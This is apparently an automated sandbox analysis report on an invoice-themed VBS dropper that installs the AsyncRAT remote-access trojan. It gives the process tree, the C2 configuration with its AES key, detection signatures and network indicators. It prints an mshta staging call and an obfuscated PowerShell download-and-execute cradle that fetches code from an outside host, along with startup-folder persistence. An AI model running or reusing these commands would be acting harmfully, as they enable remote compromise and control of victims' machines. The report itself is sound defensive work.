
Analysis Report Invoice-ID-(882451).vbs

Overview

General Information

Sample Name: Invoice-ID-(882451).vbs
Analysis ID: 359309
MD5: 3e338fb0311a9808b97c27f9427ba6fe
SHA1: 9b65363cecd8bec73dcce9501f04a62feeeab228
SHA256: a517730f91314aaaf2e7843327e8a1d7c09b8e542449152a2725f2d4361b8bb3
Tags: vbs


Detection

AsyncRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: Drops script at startup location
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected obfuscated html page
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Sigma detected: MSHTA Spawning Windows Shell
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 5924 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice-ID-(882451).vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • mshta.exe (PID: 1424 cmdline: 'C:\Windows\System32\mshta.exe' http://ahmedadel.work/cairo/Encoding.txt MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
      • powershell.exe (PID: 1320 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://ahmedadel.work/cairo/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 2932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 2240 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\Microsoft.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913)
  • mshta.exe (PID: 1260 cmdline: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 7083239CE743FDB68DFC933B7308E80A)
    • powershell.exe (PID: 5764 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\Microsoft.ps1 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: AsyncRAT

{"Server": "clayroot2016.linkpc.net", "Ports": "6666", "Version": "0.5.7B", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "", "AES_key": "e4Fpuk1cJ5OkC7E8UIORFI08LAwSyWpN", "Mutex": "AsyncMutex_6SI8OkPnk", "AntiDetection": "false", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "3", "HWID": "null", "Certificate": "[certificate omitted]", "ServerSignature": "[signature omitted]", "Group": "Default"}

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | SUSP_PS1_FromBase64String_Content_Indicator | Detects suspicious base64 encoded PowerShell expressions | Florian Roth
  • 0xa93ae:$: ::FromBase64String('TVq

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.hta | JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security
C:\Users\Public\Microsoft.ps1 | SUSP_PS1_FromBase64String_Content_Indicator | Detects suspicious base64 encoded PowerShell expressions | Florian Roth
  • 0x1c:$: ::FromBase64String('TVq

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000003.745729144.0000000005ADD000.00000004.00000001.sdmp | SUSP_PS1_FromBase64String_Content_Indicator | Detects suspicious base64 encoded PowerShell expressions | Florian Roth
  • 0x318:$: ::FromBase64String('TVq
00000005.00000002.906772895.0000000006182000.00000004.00000001.sdmp | SUSP_PS1_FromBase64String_Content_Indicator | Detects suspicious base64 encoded PowerShell expressions | Florian Roth
  • 0x5540:$: ::FromBase64String('TVq
00000009.00000002.901879167.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmp | SUSP_PS1_FromBase64String_Content_Indicator | Detects suspicious base64 encoded PowerShell expressions | Florian Roth
  • 0x1cde:$: ::FromBase64String('TVq
00000005.00000002.912905645.000000000B2F1000.00000004.00000001.sdmp | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
5.3.powershell.exe.5bcd1ec.1.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
10.2.aspnet_compiler.exe.400000.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
5.2.powershell.exe.b670778.7.raw.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
5.2.powershell.exe.b6827bc.6.raw.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security
9.2.aspnet_compiler.exe.400000.0.unpack | JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security

Sigma Overview

System Summary:

Sigma detected: Drops script at startup location
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1320, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.hta
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started; Author: Michael Haag; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://ahmedadel.work/cairo/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://ahmedadel.work/cairo/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X, CommandLine|base64offset|contains: ", Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' http://ahmedadel.work/cairo/Encoding.txt, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1424, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://ahmedadel.work/cairo/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X, ProcessId: 1320

Signature Overview

AV Detection:

Found malware configuration
Source: 00000005.00000002.912905645.000000000B2F1000.00000004.00000001.sdmp; Malware Configuration Extractor: AsyncRAT {"Server": "clayroot2016.linkpc.net", "Ports": "6666", "Version": "0.5.7B", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "", "AES_key": "e4Fpuk1cJ5OkC7E8UIORFI08LAwSyWpN", "Mutex": "AsyncMutex_6SI8OkPnk", "AntiDetection": "false", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "3", "HWID": "null", "Certificate": "[certificate blob omitted]", "ServerSignature": "[signature omitted]", "Group": "Default"}
Source: 10.2.aspnet_compiler.exe.400000.0.unpack; Avira: Label: TR/Dropper.Gen
Source: 9.2.aspnet_compiler.exe.400000.0.unpack; Avira: Label: TR/Dropper.Gen

Phishing:

Yara detected obfuscated html page
Source: Yara match; File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.hta, type: DROPPED

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown; HTTPS traffic detected: 207.241.228.153:443 -> 192.168.2.4:49715 version: TLS 1.0
Binary contains paths to debug symbols
Source: Binary string: HBAR.pdb81; source: powershell.exe, 00000005.00000002.912905645.000000000B2F1000.00000004.00000001.sdmp
Source: Binary string: HBAR.pdb; source: powershell.exe, 00000005.00000002.912905645.000000000B2F1000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\mshta.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\SysWOW64\mshta.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\mshta.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\SysWOW64\mshta.exe; File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\mshta.exe; File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\mshta.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: clayroot2016.linkpc.net
Source: global traffic; TCP traffic: 192.168.2.4:49725 -> 193.23.3.13:6666
Source: global traffic; HTTP traffic detected: GET /cairo/ALL.txt HTTP/1.1 | Host: ahmedadel.work | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /cairo/Server.txt HTTP/1.1 | Host: ahmedadel.work | Connection: Keep-Alive
Source: Joe Sandbox View; JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: global traffic; HTTP traffic detected: GET /cairo/Encoding.txt HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: ahmedadel.work | Connection: Keep-Alive
Source: unknown; HTTPS traffic detected: 207.241.228.153:443 -> 192.168.2.4:49715 version: TLS 1.0
Source: unknown; DNS traffic detected: queries for: ahmedadel.work
Source: powershell.exe, 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmp; String found in binary or memory: http://ahmedadel.work
Source: PowerShell_transcript.642294.nqkS_Vsp.20210227191803.txt.2.dr; String found in binary or memory: http://ahmedadel.work/cairo/ALL.txt
Source: mshta.exe, 00000001.00000002.651515709.000002454F74E000.00000004.00000001.sdmp, mshta.exe, 00000001.00000002.652619299.0000024D52298000.00000004.00000001.sdmp, Encoding[1].txt.1.dr; String found in binary or memory: http://ahmedadel.work/cairo/ALL.txt%27%27%29%27%3B%24TC%3DI%60E%60X%20%28%24c1%2C%24c4%2C%24c3%20-Jo
Source: powershell.exe, 00000002.00000002.908984002.000001DEA67A2000.00000004.00000001.sdmp; String found in binary or memory: http://ahmedadel.work/cairo/ALL.txtX
Source: mshta.exe, 00000001.00000002.651515709.000002454F74E000.00000004.00000001.sdmp; String found in binary or memory: http://ahmedadel.work/cairo/ALm
Source: wscript.exe, 00000000.00000002.637630976.000001CFFBA2B000.00000004.00000040.sdmp, wscript.exe, 00000000.00000002.637626504.000001CFFBA25000.00000004.00000040.sdmp, wscript.exe, 00000000.00000003.637008090.000001CFFD227000.00000004.00000001.sdmp, mshta.exe, 00000001.00000002.653067114.0000024D52ADB000.00000004.00000001.sdmp, mshta.exe, 00000001.00000002.651459548.000002454F711000.00000004.00000020.sdmp, mshta.exe, 00000001.00000002.651331087.000002454F660000.00000004.00000020.sdmp, mshta.exe, 00000001.00000002.651499116.000002454F73A000.00000004.00000020.sdmp, mshta.exe, 00000001.00000002.651349643.000002454F676000.00000004.00000020.sdmp, mshta.exe, 00000001.00000002.651380882.000002454F69B000.00000004.00000020.sdmp, Invoice-ID-(882451).vbs; String found in binary or memory: http://ahmedadel.work/cairo/Encoding.txt
Source: mshta.exe, 00000001.00000002.651474574.000002454F71E000.00000004.00000020.sdmp; String found in binary or memory: http://ahmedadel.work/cairo/Encoding.txt...
Source: mshta.exe, 00000001.00000002.651474574.000002454F71E000.00000004.00000020.sdmp; String found in binary or memory: http://ahmedadel.work/cairo/Encoding.txt...s
Source: wscript.exe, 00000000.00000003.637242970.000001CFFB729000.00000004.00000001.sdmp; String found in binary or memory: http://ahmedadel.work/cairo/Encoding.txt0
Source: mshta.exe, 00000001.00000002.651499116.000002454F73A000.00000004.00000020.sdmp; String found in binary or memory: http://ahmedadel.work/cairo/Encoding.txt7
Source: wscript.exe, 00000000.00000003.637263450.000001CFFB734000.00000004.00000001.sdmp; String found in binary or memory: http://ahmedadel.work/cairo/Encoding.txt?
Source: mshta.exe, 00000001.00000002.651459548.000002454F711000.00000004.00000020.sdmp, mshta.exe, 00000001.00000002.651331087.000002454F660000.00000004.00000020.sdmp; String found in binary or memory: http://ahmedadel.work/cairo/Encoding.txtC:
Source: mshta.exe, 00000001.00000002.651380882.000002454F69B000.00000004.00000020.sdmp; String found in binary or memory: http://ahmedadel.work/cairo/Encoding.txtH
Source: mshta.exe, 00000001.00000002.651331087.000002454F660000.00000004.00000020.sdmp; String found in binary or memory: http://ahmedadel.work/cairo/Encoding.txtHmw
Source: mshta.exe, 00000001.00000003.643767843.0000024D52A83000.00000004.00000001.sdmp; String found in binary or memory: http://ahmedadel.work/cairo/Encoding.txtLMEMX
Source: mshta.exe, 00000001.00000002.651705439.000002454F8C0000.00000004.00000040.sdmp; String found in binary or memory: http://ahmedadel.work/cairo/Encoding.txtPROFILE_Sxf
Source: wscript.exe, 00000000.00000003.637263450.000001CFFB734000.00000004.00000001.sdmp; String found in binary or memory: http://ahmedadel.work/cairo/Encoding.txtY
Source: wscript.exe, 00000000.00000002.637433590.000001CFFB767000.00000004.00000001.sdmp; String found in binary or memory: http://ahmedadel.work/cairo/Encoding.txtf
Source: mshta.exe, 00000001.00000003.643922704.0000024D52395000.00000004.00000001.sdmp; String found in binary or memory: http://ahmedadel.work/cairo/Encoding.txthttp://ahmedadel.work/cairo/Encoding.txt
Source: mshta.exe, 00000001.00000002.651371236.000002454F695000.00000004.00000020.sdmp; String found in binary or memory: http://ahmedadel.work/cairo/Encoding.txtionalmw
Source: mshta.exe, 00000001.00000002.651371236.000002454F695000.00000004.00000020.sdmp; String found in binary or memory: http://ahmedadel.work/cairo/Encoding.txtndows
Source: mshta.exe, 00000001.00000002.651371236.000002454F695000.00000004.00000020.sdmp; String found in binary or memory: http://ahmedadel.work/cairo/Encoding.txtndowsINetCookies
Source: mshta.exe, 00000001.00000002.651380882.000002454F69B000.00000004.00000020.sdmp; String found in binary or memory: http://ahmedadel.work/cairo/Encoding.txtt
Source: powershell.exe, 00000002.00000003.711702322.000001DEA4186000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.910463115.000001DEA6A77000.00000004.00000001.sdmp; String found in binary or memory: http://ahmedadel.work/cairo/Server.txt
Source: powershell.exe, 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmp; String found in binary or memory: http://ahmedadel.work/cairo/Server.txtX
Source: powershell.exe, 00000002.00000002.909554931.000001DEA68B8000.00000004.00000001.sdmp; String found in binary or memory: http://ahmedadel.workx
Source: powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmp; String found in binary or memory: http://certificates.godaddy.com/repository/0
Source: powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmp; String found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
Source: powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmp; String found in binary or memory: http://certs.godaddy.com/repository/1301
Source: powershell.exe, 00000002.00000002.917246236.000001DEBE1C5000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.903747376.0000000003336000.00000004.00000020.sdmp, aspnet_compiler.exe, 00000009.00000003.721271380.0000000005159000.00000004.00000001.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmp; String found in binary or memory: http://crl.godaddy.com/gdig2s1-1597.crl0
Source: powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmp; String found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
Source: powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmp; String found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
Source: aspnet_compiler.exe, 00000009.00000003.720499361.000000000514E000.00000004.00000001.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/
Source: aspnet_compiler.exe, 00000009.00000003.720499361.000000000514E000.00000004.00000001.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/7
Source: 77EC63BDA74BD0D0E0426DC8F8008506.9.dr; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000002.00000002.910338549.000001DEA6A4C000.00000004.00000001.sdmp; String found in binary or memory: http://ia801503.us.archive.org
Source: powershell.exe, 00000002.00000002.915900711.000001DEB5C72000.00000004.00000001.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.godaddy.com/0
Source: powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.godaddy.com/02
Source: powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmp; String found in binary or memory: http://ocsp.godaddy.com/05
Source: powershell.exe, 00000002.00000002.917186570.000001DEBE16A000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.905662877.000001DEA5E21000.00000004.00000001.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.905111532.000001DEA5C11000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.906066406.0000000005121000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.906122785.000002AA66FB1000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000009.00000002.904887989.0000000002C01000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.917290171.000001DEBE1D8000.00000004.00000001.sdmp; String found in binary or memory: http://w7icrosoft.comts/MicTiPCA_01.c
Source: powershell.exe, 00000002.00000002.917186570.000001DEBE16A000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.905662877.000001DEA5E21000.00000004.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmp; String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmp; String found in binary or memory: https://certs.godaddy.com/repository/0
Source: powershell.exe, 00000002.00000002.915900711.000001DEB5C72000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.915900711.000001DEB5C72000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.915900711.000001DEB5C72000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.917186570.000001DEBE16A000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.905662877.000001DEA5E21000.00000004.00000001.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.914665953.000001DEA7869000.00000004.00000001.sdmp; String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.910230199.000001DEA69FC000.00000004.00000001.sdmp; String found in binary or memory: https://ia801503.us.archive.org
Source: powershell.exe, 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmp; String found in binary or memory: https://ia801503.us.archive.org/13/items/startup_20210219/StartuX
Source: powershell.exe, 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.910230199.000001DEA69FC000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.909554931.000001DEA68B8000.00000004.00000001.sdmp; String found in binary or memory: https://ia801503.us.archive.org/13/items/startup_20210219/Startup.txt
Source: powershell.exe, 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmp; String found in binary or memory: https://ia801503.us.archive.org/13/items/startup_20210219/Startup.txt0y
Source: powershell.exe, 00000002.00000002.910230199.000001DEA69FC000.00000004.00000001.sdmp; String found in binary or memory: https://ia801503.us.archive.orgx
Source: powershell.exe, 00000002.00000002.915900711.000001DEB5C72000.00000004.00000001.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown; Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49715

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected AsyncRAT
Source: Yara match; File source: 00000009.00000002.901879167.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.912905645.000000000B2F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.913434202.000000000B780000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000003.745955068.0000000005B56000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.762757327.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: aspnet_compiler.exe PID: 1296, type: MEMORY
Source: Yara match; File source: Process Memory Space: powershell.exe PID: 5764, type: MEMORY
Source: Yara match; File source: Process Memory Space: aspnet_compiler.exe PID: 3544, type: MEMORY
Source: Yara match; File source: 5.3.powershell.exe.5bcd1ec.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.powershell.exe.b670778.7.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.powershell.exe.b6827bc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.3.powershell.exe.5bcd1ec.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.3.powershell.exe.5bbb094.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.powershell.exe.b6827bc.6.unpack, type: UNPACKEDPE

                  System Summary:

                  barindex
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFA372019782_2_00007FFA37201978
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0715C8A05_2_0715C8A0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07FF04485_2_07FF0448
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07FF31A55_2_07FF31A5
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07FF03E35_2_07FF03E3
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08107E005_2_08107E00
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08107E005_2_08107E00
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_08704BE8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_08700450
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_08708938
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07158B58
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_07158B68
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0715EA18
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0715EA09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 9_2_02A0D5E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 9_2_02A09530
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 9_2_02A08C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 9_2_02A0F298
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 9_2_02A08918
                  Source: Invoice-ID-(882451).vbs | Initial sample: Strings found which are bigger than 50
                  Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                  Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                  Source: dump.pcap, type: PCAP | Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
                  Source: 00000005.00000003.745729144.0000000005ADD000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
                  Source: 00000005.00000002.906772895.0000000006182000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
                  Source: 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
                  Source: Process Memory Space: powershell.exe PID: 5764, type: MEMORY | Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
                  Source: C:\Users\Public\Microsoft.ps1, type: DROPPED | Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
